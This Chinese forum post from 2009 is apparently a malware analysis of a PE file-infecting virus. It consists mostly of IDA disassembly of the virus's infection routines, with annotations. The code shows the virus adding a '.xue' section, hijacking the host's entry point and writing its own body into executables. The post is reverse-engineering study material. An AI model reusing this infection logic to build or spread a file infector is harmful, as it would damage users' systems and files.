-
-
[原创]一个节感染virus分析
-
发表于: 2009-2-18 13:06 5480
-
样本被破坏了。。。直接用IDA看的,大部分功能代码分析了,见pdb文件,这里只贴感染部分
还剩下的一些函数就是delphi消息部分的函数没分析(对delphi不熟),和一些加密函数没看
Infect proc near ; CODE XREF: infect__+1D4 p fileName= dword ptr -4 push ebp mov ebp, esp push ecx push ebx mov [ebp+fileName], eax mov eax, [ebp+fileName] call LStrLenAdd1 xor eax, eax push ebp ; DWORD push offset finally_do ; lpFileSizeHigh push dword ptr fs:[eax] ; hFile mov fs:[eax], esp xor ebx, ebx mov eax, [ebp+fileName] call GetFileSize_0 ; eax = filesize cmp eax, 40C000h jg short ret_0 cmp eax, 9C40h jl short ret_0 mov eax, [ebp+fileName] call GetFileFreeSpace ; 获取文件最后一个节末尾到文件末尾的空余空间 test eax, eax jg short ret_0 xor edx, edx mov eax, [ebp+fileName] call InfectFile ; 功能: 感染文件 ; 输入参数:eax = fileName 是delphi格式的字符串 ; 输出参数:返回0成功,1,2,3分别代表不同错误 test eax, eax jnz short ret_0 ; 出错 mov bl, 1 ret_0: ; CODE XREF: Infect+2D j Infect+34 j ... xor eax, eax pop edx pop ecx pop ecx mov fs:[eax], edx push offset ret free: ; CODE XREF: Infect+6D j lea eax, [ebp+fileName] call FreeMem_0 retn ; --------------------------------------------------------------------------- ; DWORD finally_do finally_do: ; DATA XREF: Infect+13 o jmp @System@@HandleFinally$qqrv ; System::__linkproc__ HandleFinally(void) ; --------------------------------------------------------------------------- jmp short free ; --------------------------------------------------------------------------- ret: ; CODE XREF: Infect+67 j ; DATA XREF: Infect+5A o mov eax, ebx pop ebx pop ecx pop ebp retn Infect endp ; 功能: 感染文件 ; 输入参数:eax = fileName 是delphi格式的字符串 ; 输出参数:返回0成功,1,2,3分别代表不同错误 ; Attributes: bp-based frame ; BOOL __stdcall InfectFile(char *pFileName) //ida不支持delphi的那种LStr InfectFile proc near ; CODE XREF: Infect+47 p var_1A8= dword ptr -1A8h var_1A4= dword ptr -1A4h SecTabName= dword ptr -17Ch pSecTab= byte ptr -178h pNTHeader_Signature= dword ptr -150h Machine= word ptr -14Ch numOfSec= word ptr -14Ah TimeDateStamp= dword ptr -148h PointerOfSymTab= dword ptr -144h NumberOfSymbols= dword ptr -140h SizeOfOpHeader= word ptr -13Ch Characteristics= word ptr -13Ah Magic= word ptr -138h ; 10bh var_136= byte ptr -136h var_135= byte ptr -135h SizeOfCode= dword ptr -134h SizeInitData= dword ptr -130h SizeUnInitData= dword ptr -12Ch OEP = dword ptr -128h BaseOfCode= dword ptr -124h BaseOfData= dword ptr -120h ImageBase= dword ptr -11Ch SectionAlignment= dword ptr -118h FileAlignment= dword ptr -114h var_110= word ptr -110h var_10E= word ptr -10Eh var_10C= word ptr -10Ch var_10A= word ptr -10Ah var_108= word ptr -108h var_106= word ptr -106h var_104= dword ptr -104h SizeOfImage= dword ptr -100h SizeOfHeaders= dword ptr -0FCh var_F8= dword ptr -0F8h var_F4= dword ptr -0F4h var_F0= dword ptr -0F0h var_EC= dword ptr -0ECh var_E8= dword ptr -0E8h var_E4= dword ptr -0E4h Buffer= word ptr -58h lDistanceToMove= dword ptr -1Ch NumberOfBytesWritten= dword ptr -18h NumberOfBytesRead= dword ptr -14h cur_rva= dword ptr -10h hObject= dword ptr -0Ch result= dword ptr -8 LStrFilePath= dword ptr -4 pFileName= dword ptr 8 arg_4= dword ptr 0Ch arg_8= dword ptr 10h arg_C= dword ptr 14h arg_10= dword ptr 18h push ebp mov ebp, esp add esp, 0FFFFFE84h push ebx push esi push edi xor ecx, ecx mov [ebp+SecTabName], ecx mov [ebp+LStrFilePath], eax mov eax, [ebp+LStrFilePath] call LStrLenAdd1 lea esi, [ebp+pSecTab] xor eax, eax push ebp ; ppOutData push offset exp_handle ; lpOverlapped push dword ptr fs:[eax] ; lpNumberOfBytesRead mov fs:[eax], esp push 0 ; hTemplateFile push 80h ; dwFlagsAndAttributes push 3 ; dwCreationDisposition push 0 ; lpSecurityAttributes push 3 ; dwShareMode push 0C0000000h ; dwDesiredAccess mov eax, [ebp+LStrFilePath] call @System@@LStrToPChar$qqrx17System@AnsiString ; System::__linkproc__ LStrToPChar(System::AnsiString) push eax ; lpFileName call CreateFileA_0 mov [ebp+hObject], eax cmp [ebp+hObject], 0FFFFFFFFh jnz short createfile_ok mov [ebp+result], 1 jmp ret_0 ; --------------------------------------------------------------------------- createfile_ok: ; CODE XREF: InfectFile+5A j xor edx, edx push ebp push offset exp_handle_ push dword ptr fs:[edx] mov fs:[edx], esp push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesRead] push eax ; lpNumberOfBytesRead push 40h lea eax, [ebp+Buffer] push eax ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call ReadFile_0 ; 读出PE头之前的内容 cmp [ebp+Buffer], IMAGE_DOS_SIGNATURE jz short MZ_ok mov [ebp+result], 2 call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void) jmp ret_0 ; --------------------------------------------------------------------------- MZ_ok: ; CODE XREF: InfectFile+91 j push 0 ; dwMoveMethod push 0 ; lpDistanceToMoveHigh mov eax, [ebp+lDistanceToMove] push eax ; lDistanceToMove mov eax, [ebp+hObject] push eax ; hFile call SetFilePointer_0 push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesRead] push eax ; lpNumberOfBytesRead push 0F8h ; size of IMAGE_NT_HEADERS lea eax, [ebp+pNTHeader_Signature] push eax ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call ReadFile_0 ; 读取pe头 cmp [ebp+pNTHeader_Signature], IMAGE_NT_SIGNATURE jz short PE_ok mov [ebp+result], 2 call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void) jmp ret_0 ; --------------------------------------------------------------------------- PE_ok: ; CODE XREF: InfectFile+DA j xor edi, edi xor eax, eax mov [ebp+cur_rva], eax movzx ebx, [ebp+numOfSec] dec ebx test ebx, ebx jl num_sec_zero inc ebx continue_do: ; CODE XREF: InfectFile+206 j push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesRead] push eax ; lpNumberOfBytesRead push 28h ; nNumberOfBytesToRead push esi ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call ReadFile_0 ; 读取节表 lea eax, [ebp+SecTabName] mov edx, esi call @System@@LStrFromPChar$qqrr17System@AnsiStringpc ; System::__linkproc__ LStrFromPChar(System::AnsiString &,char *) mov eax, [ebp+SecTabName] mov edx, offset name_xue ; ".xue" call @System@@LStrCmp$qqrv ; System::__linkproc__ LStrCmp(void) jnz raw_check push 0 ; dwMoveMethod push 0 ; lpDistanceToMoveHigh mov eax, [esi+IMAGE_SECTION_HEADER.PointerToRawData] push eax ; lDistanceToMove mov eax, [ebp+hObject] push eax ; hFile call SetFilePointer_0 push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesRead] push eax ; lpNumberOfBytesRead push 6E52h ; nNumberOfBytesToRead push offset pCode ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call ReadFile_0 ; 读代码 mov ecx, unknow_size cmp ecx, CodeSize jnz short finally_do mov eax, ecx xor edx, edx push edx push eax mov eax, pTable mov eax, [eax] cdq cmp edx, [esp+1A8h+var_1A4] jnz short loc_808E47 cmp eax, [esp+1A8h+var_1A8] pop edx pop eax jbe short finally_do jmp short WriteCode ; --------------------------------------------------------------------------- loc_808E47: ; CODE XREF: InfectFile+184 j pop edx pop eax jle short finally_do WriteCode: ; CODE XREF: InfectFile+18D j mov eax, pTable mov eax, [eax] mov unknow_size, eax mov eax, pTable mov eax, [eax] mov CodeSize, eax push 0 ; dwMoveMethod push 0 ; lpDistanceToMoveHigh mov eax, [esi+14h] push eax ; lDistanceToMove mov eax, [ebp+hObject] push eax ; hFile call SetFilePointer_0 call ReadFile_code push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesWritten] push eax ; lpNumberOfBytesWritten push 6E52h ; nNumberOfBytesToWrite push offset pCode ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call WriteFile_0 finally_do: ; CODE XREF: InfectFile+170 j ; InfectFile+18B j ... mov [ebp+result], 3 call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void) jmp ret_0 ; --------------------------------------------------------------------------- raw_check: ; CODE XREF: InfectFile+134 j mov eax, [esi+IMAGE_SECTION_HEADER.PointerToRawData] add eax, [esi+IMAGE_SECTION_HEADER.SizeOfRawData] cmp edi, eax jnb short rva_check mov edi, eax rva_check: ; CODE XREF: InfectFile+1F3 j mov eax, [esi+IMAGE_SECTION_HEADER.VirtualAddress] add eax, [esi+IMAGE_SECTION_HEADER.Misc.VirtualSize] cmp eax, [ebp+cur_rva] jbe short dec mov [ebp+cur_rva], eax dec: ; CODE XREF: InfectFile+200 j dec ebx jnz continue_do num_sec_zero: ; CODE XREF: InfectFile+FE j mov eax, [ebp+OEP] cmp eax, [ebp+BaseOfData] ;检查入口是否在data段 jbe short loc_808EE3 ;文件入口正常,跳去增加节 mov [ebp+result], 3 call @System@@TryFinallyExit$qqrv ; System::__linkproc__ TryFinallyExit(void) jmp ret_0 ; --------------------------------------------------------------------------- loc_808EE3: ; CODE XREF: InfectFile+218 j mov ebx, offset nullsub_2 sub ebx, offset GetCurLineAddr add ebx, 6E52h mov edx, esi mov ecx, 5 ; 添加节名 mov eax, offset sec_name_xue ; ".xue" call LStrCpy__ ; delphi版本的字符串拷贝函数: ; eax = src edx = des ecx = size mov eax, pTable mov eax, [eax] mov unknow_size, eax mov eax, pTable mov eax, [eax] mov CodeSize, eax mov [esi+IMAGE_SECTION_HEADER.Misc.PhysicalAddress], ebx mov eax, [ebp+cur_rva] mov [esi+IMAGE_SECTION_HEADER.VirtualAddress], eax mov [esi+IMAGE_SECTION_HEADER.SizeOfRawData], ebx mov [esi+IMAGE_SECTION_HEADER.PointerToRawData], edi xor eax, eax mov [esi+IMAGE_SECTION_HEADER.PointerToRelocations], eax xor eax, eax mov [esi+IMAGE_SECTION_HEADER.PointerToLinenumbers], eax mov [esi+IMAGE_SECTION_HEADER.NumberOfRelocations], 0 mov eax, [esi+IMAGE_SECTION_HEADER.VirtualAddress] mov edx, eax and edx, 0FFFh test edx, edx jbe short rva_bad shr eax, 0Ch inc eax shl eax, 0Ch mov [esi+IMAGE_SECTION_HEADER.VirtualAddress], eax rva_bad: ; CODE XREF: InfectFile+291 j mov eax, [esi+IMAGE_SECTION_HEADER.PointerToRawData] mov edx, eax and edx, 1FFh test edx, edx jbe short loc_808F6E shr eax, 9 inc eax shl eax, 9 mov [esi+IMAGE_SECTION_HEADER.PointerToRawData], eax loc_808F6E: ; CODE XREF: InfectFile+2AA j mov [esi+IMAGE_SECTION_HEADER.Characteristics], 0E00000E0h push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesWritten] push eax ; lpNumberOfBytesWritten push 28h ; nNumberOfBytesToWrite push esi ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call WriteFile_0 ; 添加节表 mov eax, [ebp+OEP] mov OrgOEP, eax ; 保存原OEP mov eax, [ebp+ImageBase] mov pCode, eax mov eax, [esi+IMAGE_SECTION_HEADER.VirtualAddress] add eax, 6E52h add eax, offset sub_8088BC sub eax, offset GetCurLineAddr mov [ebp+OEP], eax ; 修改OEP add [ebp+SizeOfImage], ebx inc [ebp+numOfSec] push 0 ; dwMoveMethod push 0 ; lpDistanceToMoveHigh mov eax, [ebp+lDistanceToMove] push eax ; lDistanceToMove mov eax, [ebp+hObject] push eax ; hFile call SetFilePointer_0 push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesWritten] push eax ; lpNumberOfBytesWritten push 0F8h ; nNumberOfBytesToWrite lea eax, [ebp+pNTHeader_Signature] push eax ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call WriteFile_0 ; 调整PE头 push 0 ; dwMoveMethod push 0 ; lpDistanceToMoveHigh mov eax, [esi+14h] push eax ; lDistanceToMove mov eax, [ebp+hObject] push eax ; hFile call SetFilePointer_0 push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesWritten] push eax ; lpNumberOfBytesWritten push 6E52h ; nNumberOfBytesToWrite push offset pCode ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call WriteFile_0 push 0 ; lpOverlapped lea eax, [ebp+NumberOfBytesWritten] push eax ; lpNumberOfBytesWritten mov eax, offset nullsub_2 sub eax, offset GetCurLineAddr push eax ; nNumberOfBytesToWrite mov eax, offset GetCurLineAddr push eax ; lpBuffer mov eax, [ebp+hObject] push eax ; hFile call WriteFile_0 xor eax, eax mov [ebp+result], eax xor eax, eax pop edx pop ecx pop ecx mov fs:[eax], edx push offset ret_0 ret_1: ; CODE XREF: InfectFile+3A4 j mov eax, [ebp+hObject] push eax ; hObject call CloseHandle_0 retn ; --------------------------------------------------------------------------- exp_handle_: ; DATA XREF: InfectFile+6B o jmp @System@@HandleFinally$qqrv ; System::__linkproc__ HandleFinally(void) ; --------------------------------------------------------------------------- jmp short ret_1 ; --------------------------------------------------------------------------- ret_0: ; CODE XREF: InfectFile+63 j ; InfectFile+9F j ... xor eax, eax pop edx pop ecx pop ecx mov fs:[eax], edx push offset ret_writeok free: ; CODE XREF: InfectFile+3CC j lea eax, [ebp+SecTabName] call FreeMem_0 lea eax, [ebp+LStrFilePath] call FreeMem_0 retn ; --------------------------------------------------------------------------- ; DWORD exp_handle exp_handle: ; DATA XREF: InfectFile+28 o jmp @System@@HandleFinally$qqrv ; System::__linkproc__ HandleFinally(void) ; --------------------------------------------------------------------------- jmp short free ; --------------------------------------------------------------------------- ret_writeok: ; CODE XREF: InfectFile+3C6 j ; DATA XREF: InfectFile+3AE o mov eax, [ebp+result] pop edi pop esi pop ebx mov esp, ebp pop ebp retn InfectFile endp
还剩下的一些函数就是delphi消息部分的函数没分析(对delphi不熟),和一些加密函数没看
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏记录
参与人
雪币
留言
时间
Youlor
为你点赞~
2024-1-17 01:36
伟叔叔
为你点赞~
2023-12-20 00:05
QinBeast
为你点赞~
2023-10-1 05:14
一笑人间万事
为你点赞~
2023-9-3 00:07
shinratensei
为你点赞~
2023-8-31 04:32
心游尘世外
为你点赞~
2023-8-23 00:00
飘零丶
为你点赞~
2023-8-10 00:33
赞赏
看原图
赞赏
雪币:
留言: